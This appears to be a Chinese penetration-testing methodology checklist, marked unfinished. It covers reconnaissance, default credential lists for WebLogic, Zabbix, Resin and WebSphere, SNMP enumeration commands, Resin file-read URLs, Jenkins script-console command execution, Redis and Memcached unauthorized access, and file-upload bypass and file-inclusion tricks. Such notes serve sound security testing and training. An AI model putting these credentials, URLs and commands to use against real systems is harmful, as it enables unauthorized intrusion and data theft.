滲透測試流程未完成篇

信息收集---
|
|
開放的端口
端口服務
DNS：DNS域傳輸漏洞（測試方法:dnsenum 域名）
WEB指紋識別
C段查詢
旁站查詢
WHOIS信息
網站敏感目錄
網站泄露的目錄
查看HTML有沒有有用的註釋
收集管理員郵箱
網站後臺
常見的服務是否有弱口令:FTP匿名訪問/弱口令,Rsync匿名訪問：端口是873
端口服務nmap腳本掃描看看能不能挖到漏洞
searchsploit搜索系統服務看看能不能找到exp
burpsuite爬網站
表單嘗試弱口令
表單嘗試邏輯漏洞，
cms識別。
weblogic弱口令：默認管理員帳號密碼:weblogic/weblogic,開放的端口是：7001還有掃描80與8080端口看banner。默認weblogic是/console。常見的弱口令：
weblogic / welcome1
system / password
admin / security
mary / password
joe / password
wlcsystem / wlcsystem
wlpisystem / wlpisystem
weblogic / weblogic123
weblogic / 12345678
admin / 12345678
s2漏洞
web服務器解析漏洞
Struts漏洞
網站備份文件
Apache Server status對外暴露，測試方法：訪問http://xxx.com/server-status
snmp弱口令：snmp服務器的默認密碼爲public，漏洞發現與掃描：
<1>x-scan掃描 + GFI LANGard利用
<2>使用Snmp Digger進行漏洞利用
<3>snmputil.exe
snmputil.exe get|getnext|walk agent community oid[oid……]
當前進程列表 snmputil.exe walk ip public .1.3.6.1.2.1.25.4.2.1.2
系統用戶列表 snmputil.exe walk ip public .1.3.6.1.4.1.77.1.2.25.1.1
列 出 域 名 snmputil.exe walk ip public .1.3.6.1.4.1.77.1.4.1.0
列出安裝軟件 snmputil.exe walk ip public .1.3.6.1.2.1.25.6.3.1.2
列出系統信息 snmputil.exe walk ip public .1.3.6.1.2.1.1
<4>IP Network Browser（snmp瀏覽工具）
snmp默認開放的端口:161
snmap獲取管理員密碼：掃描工具： solarwinds中的snmpsweep
升級版： solarwinds工具包中的?ip browser
<2>華爲quidway三層交換
利用這個OID讀出的密碼爲明文（WooYun-2013-21964）
root@bt:~# snmpwalk -c private -v 1 x.x.x.x 帳號的oid
svn文件泄露
nagios信息泄露
hadhoop對外訪問 檢測弱口令
RTX即時通訊泄露,端口：8012。開放應用端口暴露： http://xx.xx.xx.xx:8012/userlist.php
直接能夠訪問到全部用戶id、用戶名等信息的json
在「查看審覈結果處」嘗試用戶名+弱口令(3102 或123456)登錄，登錄成功後即進入內部網絡。
<2>獲得用戶名後，能夠讀取手機號
用戶名： rtx.bxlq.com/userlist.php
手機號： rtx.bxlq.com/getmobile.cgi?receiver=用戶名
Ganglia系統監控信息泄露 開放端口：8649或8000 檢測方法：<1>直接在瀏覽器地址欄輸入IP:8649 eg: http://xx.xx.xxx.xx:8649/
<2>直接訪問域名：ganglia.xx.com
<3>使用nc查看： nc.exe iii.com 8649 |more
j2ee應用架構（web服務器搭配不當）訪問敏感目錄：http://xxx.com/WEB-IINF/web.xml
Jenkins平臺未設置登陸驗證 利用方法：<1>未受權訪問，可直接執行命令 wooyun-2013-028803
直接在url中訪問： eg: http://xx.xx.xx.xx:8080 (端口視具體狀況而定，案例中有3000、8888)
<2> http://ip/script
java.lang.Runtime.getRuntime().exec(‘id’).getText(); 行腳本並回顯一句話
<1>未受權訪問，可直接執行命令 wooyun-2013-028803
直接在url中訪問： eg: http://xx.xx.xx.xx:8080 (端口視具體狀況而定，案例中有3000、8888)
<2> http://ip/script
java.lang.Runtime.getRuntime().exec(‘id’).getText(); 行腳本並回顯一句話

zabbix默認口令 利用方法：弱口令進入後臺： http://ip/zabbix/ admin / zabbix
攻擊方法：
<1>嘗試system.run執行命令
<2>獲取zabbix server shell：
Administrator——>Scripts——>修改Commands(例如改成 uname -a)
Monitoring——>Last data——>點擊Zabbix server，執行調用命令

Resin任意文件讀取 利用方法：<1>任意文件讀取：
配置文件：
http://ip/resin-doc/examples/ico-periodictask/viewfile?file=WEB-INF/web.xml
讀取源碼：
http://ip/resin-doc/examples/ico-periodictask/viewfile?file=index.xtp
讀取password.xml
ip/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/password.xml

<2>resin文件包含漏洞shell (wooyun-2013-023139)
http://ip/Resin-doc/viewfile/?contextpath=C:\&servletpath=&file=boot.ini

<3>resin弱口令
http://ip/resin-admin/status.php admin / admin

<4>resin版本太低，致使磁盤信息泄露
http://ip/c:/
memcache未限制訪問IP 利用方法：Memcached未限制IP致使cache泄露 服務默認端口：11211
使用nc 反彈查看數據：
<1>
nc.exe –vv ip 11211
ip: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [ip] 11211 (?) open
stats items
STAT items:4:number 1544729
…….

<2>memcached空口令訪問 能夠直接telnet登錄 wooyun-2010-0123604
<2>root@kali:~# nc ip 11211
Jboss配置不當 利用方法：檢測如下目錄：
http://yy.yy.yy.yy/admin-console/
http://yy.yy.yy.yy/jmx-console/
http://xx.xx.xx.xx/web-console/
yy.yy.yy.yy/invoker/JMXInvokerServlet

tomcat弱口令
phpmyadmin弱口令
MongoDB配置不當
Django配置不當致信息泄露
Redis未受權訪問 開放的端口：6379 通常不須要認證，可直接訪問 利用方法：<1>Kali下：
redis-cli -h xx.com
<2>使用軟件： Redis Desktop Manager
<3>利用redis未受權訪問漏洞getshell【www.secpulse.com/archives/5357.html】
①開啓web服務
②網站物理路徑
③www目錄可寫（root權限）

LDAP未受權訪問 開放端口：389 利用方式：使用LDAP Admin進行登錄
SMB弱口令 開放端口：445
openssl心臟出血 開放端口：443 檢測方法：用nmap腳本檢測 利用方式：metasploit裏面有腳本
squid代理默認端口 開放端口：3128 若沒有設置口令，則極可能直接漫遊內網。
GlassFish web中間件弱口令 開放端口：4848 檢測
elasticsearch代碼執行 開放端口: 9200
websphere web中間件弱口令 開放端口：9043 常見弱口令：admin / admin
websphere / websphere
system / manager

zebra路由弱密碼 開放端口：2601,2604
rundeck web 開放端口：4440 檢測方法：檢測如下路徑 http://IP:4440 admin / admin http://IP:4440/menu/home
dns未設置spf致使郵箱欺騙漏洞 檢測方法：nslookup –qt=mx baidu.com nslookup –qt=txt baidu.com
CVS源碼泄露
Tomcat examples directory漏洞 檢測方法：http://yy.yy.yy.yy/examples/servlets/servlet/SessionExample

 

 

漏洞挖掘--- | |SQL注入：注意網站的URL有id=?都拿到SQLMAP測試一遍或者手測，表單進行單和雙引號進行測試，用burpsuite抓表單提交的包扔SQLMAP跑，網站有調用數據庫的地方都測試一遍，API接口測試SQL注入文件上傳：能上傳文件的地方就嘗試進行挖掘。遇到攔截先看看服務器用什麼配置的環境。例如是IIS6.0（IIS環境大部分都有文件上傳漏洞能夠百度發現）或Apache等等。。均可以百度看看有什麼上傳繞過。通常繞過方式爲：後綴大小寫繞過，文件類型繞過，雙寫後綴名繞過，請求特殊後綴繞過，圖片木馬合併上傳，文件00截斷繞過，截斷攻擊%和&，web服務器環境配置尋找漏洞 例如：IIS6.0的解析漏洞1）前端JavaScript驗證 （發現有隻前端驗證的話，手動寫一個文件上傳的html將action設置爲判斷文件便可。）例如：檢測上傳文件的是：upload.php 可是服務端沒作判斷，前端作了判斷。<form action=’http://xx/upload.php’ method=’post’><input type=’file’ name=’file’ id=’file’><br><input type=’submit’ value=’提交’></form>文件包含：注意url後面有include=xx.php,或tiao=xx.php，file=xxx.php，總之注意一下url。先判斷遠程包含或本地包含，能夠遠程包含直接Getshell便可。本地包含能夠利用各類僞協議例如：php,data,zip等等。。或與文件上傳漏洞一塊兒利用。詳細的利用手法：https://www.cnblogs.com/haq5201314/p/9248281.html